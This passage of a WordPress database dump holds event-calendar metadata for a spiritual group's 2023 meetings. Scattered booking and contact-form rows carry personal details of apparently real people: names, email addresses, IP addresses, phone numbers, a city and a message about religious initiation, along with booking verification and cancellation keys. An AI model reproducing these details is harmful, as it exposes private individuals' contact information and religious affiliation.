booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(174459,267613,'passster_activate_global_protection',NULL),(174460,267613,'passster_activate_protection',NULL),(174461,267613,'passster_protection_type','password'),(174462,267613,'boldgrid_in_page_containers','1'),(174463,267613,'_thumbnail_id','266627'),(174465,267613,'_dp_original','267092'),(174466,267613,'_edit_lock','1673150093:2'),(174467,267613,'_edit_last','2'),(174468,267614,'mec_transaction_id','DMP71445'),(174469,267614,'mec_user_id','1000022'),(174470,267614,'mec_verified','1'),(174471,267614,'mec_verification_key','983b750c325311825c5f15f213a41d8e'),(174472,267614,'mec_cancellation_key','67a5f54394cd25d1e8c0cdfb7fdb05ac'),(174473,267614,'mec_confirmed','1'),(174474,267614,'mec_event_id','267577'),(174475,267614,'mec_date','1673173800:1673177400'),(174476,267614,'mec_ticket_id',',1,'),(174477,267614,'mec_booking_time','2023-01-07 20:50:52'),(174478,267614,'mec_all_dates','a:0:{}'),(174479,267614,'mec_other_dates','a:0:{}'),(174480,267614,'mec_attention_time','1673173800:1673177400'),(174481,267614,'mec_attention_time_start','1673173800'),(174482,267614,'mec_attention_time_end','1673177400'),(174483,267614,'mec_book_date_submit','20230107205052'),(174484,267614,'mec_booking_location','129'),(174485,267614,'mec_ticket_price_1','0'),(174486,267614,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:11:\"24.2.64.225\";}}'),(174487,267614,'mec_price','0'),(174488,267614,'mec_gateway','MEC_gateway_free'),(174489,267614,'mec_gateway_label','Free'),(174490,267616,'mec_transaction_id','HUW88257'),(174491,267616,'mec_user_id','1000063'),(174492,267616,'mec_verified','1'),(174493,267616,'mec_verification_key','0a5d5ec5d2900709cf9227a02685dce8'),(174494,267616,'mec_cancellation_key','58462c54c5e37feab4add00083e5f736'),(174495,267616,'mec_confirmed','1'),(174496,267616,'mec_event_id','267577'),(174497,267616,'mec_date','1673173800:1673177400'),(174498,267616,'mec_ticket_id',',1,'),(174499,267616,'mec_booking_time','2023-01-08 10:29:42'),(174500,267616,'mec_all_dates','a:0:{}'),(174501,267616,'mec_other_dates','a:0:{}'),(174502,267616,'mec_attention_time','1673173800:1673177400'),(174503,267616,'mec_attention_time_start','1673173800'),(174504,267616,'mec_attention_time_end','1673177400'),(174505,267616,'mec_book_date_submit','20230108102942'),(174506,267616,'mec_booking_location','129'),(174507,267616,'mec_ticket_price_1','0'),(174508,267616,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:18:\"bjinlohi@gmail.com\";s:4:\"name\";s:9:\"BJ Wagner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"136.29.71.110\";}}'),(174509,267616,'mec_price','0'),(174510,267616,'mec_gateway','MEC_gateway_free'),(174511,267616,'mec_gateway_label','Free'),(174512,267617,'protect_children',''),(174513,267617,'mec_color',''),(174514,267617,'mec_location_id','118'),(174515,267617,'mec_dont_show_map','0'),(174516,267617,'mec_organizer_id','1'),(174517,267617,'mec_read_more',''),(174518,267617,'mec_more_info',''),(174519,267617,'mec_more_info_title',''),(174520,267617,'mec_more_info_target','_self'),(174521,267617,'mec_cost',''),(174522,267617,'mec_currency','a:0:{}'),(174523,267617,'mec_additional_organizer_ids','a:0:{}'),(174524,267617,'mec_additional_location_ids','a:0:{}'),(174525,267617,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-21\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-21\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(174526,267617,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(174527,267617,'mec_certain_weekdays','a:0:{}'),(174528,267617,'mec_allday','0'),(174529,267617,'one_occurrence','0'),(174530,267617,'mec_hide_time','0'),(174531,267617,'mec_hide_end_time','0'),(174532,267617,'mec_comment',''),(174533,267617,'mec_timezone','global'),(174534,267617,'mec_countdown_method','global'),(174535,267617,'mec_public','1'),(174536,267617,'mec_start_date','2023-02-21'),(174537,267617,'mec_start_time_hour','7'),(174538,267617,'mec_start_time_minutes','0'),(174539,267617,'mec_start_time_ampm','PM'),(174540,267617,'mec_start_day_seconds','68400'),(174541,267617,'mec_end_date','2023-02-21'),(174542,267617,'mec_end_time_hour','8'),(174543,267617,'mec_end_time_minutes','0'),(174544,267617,'mec_end_time_ampm','PM'),(174545,267617,'mec_end_day_seconds','72000'),(174546,267617,'mec_repeat_status','0'),(174547,267617,'mec_repeat_type',''),(174548,267617,'mec_repeat_interval','1'),(174549,267617,'mec_repeat_end',''),(174550,267617,'mec_repeat_end_at_occurrences',''),(174551,267617,'mec_repeat_end_at_date',''),(174552,267617,'mec_advanced_days','a:0:{}'),(174553,267617,'mec_in_days',''),(174554,267617,'mec_not_in_days',''),(174555,267617,'mec_hourly_schedules','a:0:{}'),(174556,267617,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(174557,267617,'mec_tickets','a:0:{}'),(174558,267617,'mec_fees_global_inheritance','1'),(174559,267617,'mec_fees','a:0:{}'),(174560,267617,'mec_ticket_variations_global_inheritance','1'),(174561,267617,'mec_ticket_variations','a:0:{}'),(174562,267617,'mec_reg_fields_global_inheritance','1'),(174563,267617,'mec_reg_fields','a:0:{}'),(174564,267617,'mec_bfixed_fields','a:0:{}'),(174565,267617,'mec_op','a:0:{}'),(174566,267617,'mec_fields','a:0:{}'),(174567,267617,'mec_event_status','EventScheduled'),(174568,267617,'mec_moved_online_link',''),(174569,267617,'mec_cancelled_reason',''),(174570,267617,'mec_display_cancellation_reason_in_single_page',''),(174571,267617,'boldgrid_hide_page_title','0'),(174572,267617,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(174573,267617,'passster_activate_global_protection',NULL),(174574,267617,'passster_activate_protection',NULL),(174575,267617,'passster_protection_type','password'),(174576,267617,'boldgrid_in_page_containers','1'),(174577,267617,'_thumbnail_id','266627'),(174579,267617,'_dp_original','267613'),(174580,267617,'_edit_lock','1673207140:2'),(174581,267617,'_edit_last','2'),(174582,267619,'protect_children',''),(174583,267619,'mec_color',''),(174584,267619,'mec_location_id','118'),(174585,267619,'mec_dont_show_map','0'),(174586,267619,'mec_organizer_id','1'),(174587,267619,'mec_read_more',''),(174588,267619,'mec_more_info',''),(174589,267619,'mec_more_info_title',''),(174590,267619,'mec_more_info_target','_self'),(174591,267619,'mec_cost',''),(174592,267619,'mec_currency','a:0:{}'),(174593,267619,'mec_additional_organizer_ids','a:0:{}'),(174594,267619,'mec_additional_location_ids','a:0:{}'),(174595,267619,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-24\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-24\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(174596,267619,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:11:\"custom_days\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(174597,267619,'mec_certain_weekdays','a:0:{}'),(174598,267619,'mec_allday','0'),(174599,267619,'one_occurrence','0'),(174600,267619,'mec_hide_time','0'),(174601,267619,'mec_hide_end_time','0'),(174602,267619,'mec_comment',''),(174603,267619,'mec_timezone','global'),(174604,267619,'mec_countdown_method','global'),(174605,267619,'mec_public','1'),(174606,267619,'mec_start_date','2023-02-24'),(174607,267619,'mec_start_time_hour','6'),(174608,267619,'mec_start_time_minutes','30'),(174609,267619,'mec_start_time_ampm','PM'),(174610,267619,'mec_start_day_seconds','66600'),(174611,267619,'mec_end_date','2023-02-24'),(174612,267619,'mec_end_time_hour','8'),(174613,267619,'mec_end_time_minutes','30'),(174614,267619,'mec_end_time_ampm','PM'),(174615,267619,'mec_end_day_seconds','73800'),(174616,267619,'mec_repeat_status','1'),(174617,267619,'mec_repeat_type','custom_days'),(174618,267619,'mec_repeat_interval','1'),(174619,267619,'mec_repeat_end','never'),(174620,267619,'mec_repeat_end_at_occurrences','9'),(174621,267619,'mec_repeat_end_at_date',''),(174622,267619,'mec_advanced_days','a:0:{}'),(174623,267619,'mec_in_days','2023-02-24:2023-02-24:06-30-PM:08-30-PM,2023-03-10:2023-03-10:06-30-PM:08-30-PM,2023-03-24:2023-03-24:06-30-PM:08-30-PM,2023-03-31:2023-03-31:06-30-PM:08-30-PM,2023-04-14:2023-04-14:06-30-PM:08-30-PM,2023-04-28:2023-04-28:06-30-PM:08-30-PM'),(174624,267619,'mec_not_in_days',''),(174625,267619,'mec_hourly_schedules','a:0:{}'),(174626,267619,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(174627,267619,'mec_tickets','a:0:{}'),(174628,267619,'mec_fees_global_inheritance','1'),(174629,267619,'mec_fees','a:0:{}'),(174630,267619,'mec_ticket_variations_global_inheritance','1'),(174631,267619,'mec_ticket_variations','a:0:{}'),(174632,267619,'mec_reg_fields_global_inheritance','1'),(174633,267619,'mec_reg_fields','a:0:{}'),(174634,267619,'mec_bfixed_fields','a:0:{}'),(174635,267619,'mec_op','a:0:{}'),(174636,267619,'mec_fields','a:0:{}'),(174637,267619,'mec_event_status','EventScheduled'),(174638,267619,'mec_moved_online_link',''),(174639,267619,'mec_cancelled_reason',''),(174640,267619,'mec_display_cancellation_reason_in_single_page',''),(174641,267619,'boldgrid_hide_page_title','0'),(174642,267619,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(174643,267619,'passster_activate_global_protection',NULL),(174644,267619,'passster_activate_protection',NULL),(174645,267619,'passster_protection_type','password'),(174646,267619,'boldgrid_in_page_containers','1'),(174647,267619,'_thumbnail_id','266627'),(174649,267619,'_dp_original','267617'),(174650,267619,'_edit_lock','1673207670:2'),(174651,267619,'_edit_last','2'),(174652,267620,'protect_children',''),(174653,267620,'mec_color',''),(174654,267620,'mec_location_id','118'),(174655,267620,'mec_dont_show_map','0'),(174656,267620,'mec_organizer_id','1'),(174657,267620,'mec_read_more',''),(174658,267620,'mec_more_info',''),(174659,267620,'mec_more_info_title',''),(174660,267620,'mec_more_info_target','_self'),(174661,267620,'mec_cost',''),(174662,267620,'mec_currency','a:0:{}'),(174663,267620,'mec_additional_organizer_ids','a:0:{}'),(174664,267620,'mec_additional_location_ids','a:0:{}'),(174665,267620,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-01-29\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-01-29\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(174666,267620,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(174667,267620,'mec_certain_weekdays','a:0:{}'),(174668,267620,'mec_allday','0'),(174669,267620,'one_occurrence','0'),(174670,267620,'mec_hide_time','0'),(174671,267620,'mec_hide_end_time','0'),(174672,267620,'mec_comment',''),(174673,267620,'mec_timezone','global'),(174674,267620,'mec_countdown_method','global'),(174675,267620,'mec_public','1'),(174676,267620,'mec_start_date','2023-01-29'),(174677,267620,'mec_start_time_hour','10'),(174678,267620,'mec_start_time_minutes','30'),(174679,267620,'mec_start_time_ampm','AM'),(174680,267620,'mec_start_day_seconds','37800'),(174681,267620,'mec_end_date','2023-01-29'),(174682,267620,'mec_end_time_hour','12'),(174683,267620,'mec_end_time_minutes','0'),(174684,267620,'mec_end_time_ampm','PM'),(174685,267620,'mec_end_day_seconds','43200'),(174686,267620,'mec_repeat_status','0'),(174687,267620,'mec_repeat_type',''),(174688,267620,'mec_repeat_interval','1'),(174689,267620,'mec_repeat_end',''),(174690,267620,'mec_repeat_end_at_occurrences',''),(174691,267620,'mec_repeat_end_at_date',''),(174692,267620,'mec_advanced_days','a:0:{}'),(174693,267620,'mec_in_days',''),(174694,267620,'mec_not_in_days',''),(174695,267620,'mec_hourly_schedules','a:0:{}'),(174696,267620,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(174697,267620,'mec_tickets','a:0:{}'),(174698,267620,'mec_fees_global_inheritance','1'),(174699,267620,'mec_fees','a:0:{}'),(174700,267620,'mec_ticket_variations_global_inheritance','1'),(174701,267620,'mec_ticket_variations','a:0:{}'),(174702,267620,'mec_reg_fields_global_inheritance','1'),(174703,267620,'mec_reg_fields','a:0:{}'),(174704,267620,'mec_bfixed_fields','a:0:{}'),(174705,267620,'mec_op','a:0:{}'),(174706,267620,'mec_fields','a:0:{}'),(174707,267620,'mec_event_status','EventScheduled'),(174708,267620,'mec_moved_online_link',''),(174709,267620,'mec_cancelled_reason',''),(174710,267620,'mec_display_cancellation_reason_in_single_page',''),(174711,267620,'boldgrid_hide_page_title','0'),(174712,267620,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(174713,267620,'passster_activate_global_protection',NULL),(174714,267620,'passster_activate_protection',NULL),(174715,267620,'passster_protection_type','password'),(174718,267620,'_dp_original','266104'),(174717,267620,'boldgrid_in_page_containers','1'),(174719,267620,'_edit_lock','1690652463:2'),(174720,267620,'_edit_last','2'),(174748,267623,'_form_id','12'),(174749,267623,'_seq_num','3'),(174750,267624,'protect_children',''),(174751,267624,'mec_color',''),(174752,267624,'mec_location_id','118'),(174753,267624,'mec_dont_show_map','0'),(174754,267624,'mec_organizer_id','1'),(174755,267624,'mec_read_more',''),(174756,267624,'mec_more_info',''),(174757,267624,'mec_more_info_title',''),(174758,267624,'mec_more_info_target','_self'),(174759,267624,'mec_cost',''),(174760,267624,'mec_currency','a:0:{}'),(174761,267624,'mec_additional_organizer_ids','a:0:{}'),(174762,267624,'mec_additional_location_ids','a:0:{}'),(174763,267624,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-02-01\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-02-01\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(174764,267624,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(174724,267598,'original-file','2022/12/sky-clouds-1-updraft-pre-smush-original.jpg'),(174725,267598,'smush-complete','1'),(174726,267598,'smush-info','The file was compressed from 226.46 KB to 216.81 KB saving 4.26 percent using WP-Optimize'),(174727,267598,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:231898;s:12:\"smushed-size\";i:222014;s:15:\"savings-percent\";d:4.26;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:231898;s:10:\"compressed\";i:222014;}s:6:\"medium\";a:2:{s:8:\"original\";i:11791;s:10:\"compressed\";i:11791;}s:5:\"large\";a:2:{s:8:\"original\";i:73247;s:10:\"compressed\";i:73247;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5857;s:10:\"compressed\";i:5791;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:47701;s:10:\"compressed\";i:47701;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:16585;s:10:\"compressed\";i:16585;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:26218;s:10:\"compressed\";i:26218;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19197;s:10:\"compressed\";i:19197;}s:8:\"tileview\";a:2:{s:8:\"original\";i:18978;s:10:\"compressed\";i:18978;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:133459;s:10:\"compressed\";i:133459;}}}'),(174747,267623,'_field_129','Hello,\nI recently received a pink slip for my 6th initiation and am looking to schedule with an initiator. I live in Colorado Springs, but am willing to go to greater Denver area if needed.\n\nThank you, \nGil Hathcoat\nghathcoat@msn.com\n719.460.7608\n '),(174746,267623,'_field_128','Local Director'),(174744,267623,'_field_124','(719) 460-7608'),(174745,267623,'_field_125','Co Springs'),(174732,267620,'_thumbnail_id','267223'),(191784,269102,'_field_651','(801) 662-8342'),(191785,269102,'_field_656','The Easy Way Discourses - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom'),(191786,269102,'_field_649','Hello, I am Sue Smith will be the Arahata, so just testing this so I can advise new members on how to register.  This is such a great way to combine our areas into a Satsang!'),(174741,267623,'_field_121','Gil'),(174742,267623,'_field_122','Hathcoat'),(174743,267623,'_field_123','ghathcoat@msn.com'),(174765,267624,'mec_certain_weekdays','a:0:{}'),(174766,267624,'mec_allday','0'),(174767,267624,'one_occurrence','0'),(174768,267624,'mec_hide_time','0'),(174769,267624,'mec_hide_end_time','0'),(174770,267624,'mec_comment',''),(174771,267624,'mec_timezone','global'),(174772,267624,'mec_countdown_method','global'),(174773,267624,'mec_public','1'),(174774,267624,'mec_start_date','2023-02-01'),(174775,267624,'mec_start_time_hour','7'),(174776,267624,'mec_start_time_minutes','0'),(174777,267624,'mec_start_time_ampm','PM'),(174778,267624,'mec_start_day_seconds','68400'),(174779,267624,'mec_end_date','2023-02-01'),(174780,267624,'mec_end_time_hour','8'),(174781,267624,'mec_end_time_minutes','0'),(174782,267624,'mec_end_time_ampm','PM'),(174783,267624,'mec_end_day_seconds','72000'),(174784,267624,'mec_repeat_status','0'),(174785,267624,'mec_repeat_type',''),(174786,267624,'mec_repeat_interval','1'),(174787,267624,'mec_repeat_end',''),(174788,267624,'mec_repeat_end_at_occurrences',''),(174789,267624,'mec_repeat_end_at_date',''),(174790,267624,'mec_advanced_days','a:0:{}'),(174791,267624,'mec_in_days',''),(174792,267624,'mec_not_in_days',''),(174793,267624,'mec_hourly_schedules','a:0:{}'),(174794,267624,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(174795,267624,'mec_tickets','a:0:{}'),(174796,267624,'mec_fees_global_inheritance','1'),(174797,267624,'mec_fees','a:0:{}'),(174798,267624,'mec_ticket_variations_global_inheritance','1'),(174799,267624,'mec_ticket_variations','a:0:{}'),(174800,267624,'mec_reg_fields_global_inheritance','1'),(174801,267624,'mec_reg_fields','a:0:{}'),(174802,267624,'mec_bfixed_fields','a:0:{}'),(174803,267624,'mec_op','a:0:{}'),(174804,267624,'mec_fields','a:0:{}'),(174805,267624,'mec_event_status','EventScheduled'),(174806,267624,'mec_moved_online_link',''),(174807,267624,'mec_cancelled_reason',''),(174808,267624,'mec_display_cancellation_reason_in_single_page',''),(174809,267624,'boldgrid_hide_page_title','0'),(174810,267624,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br 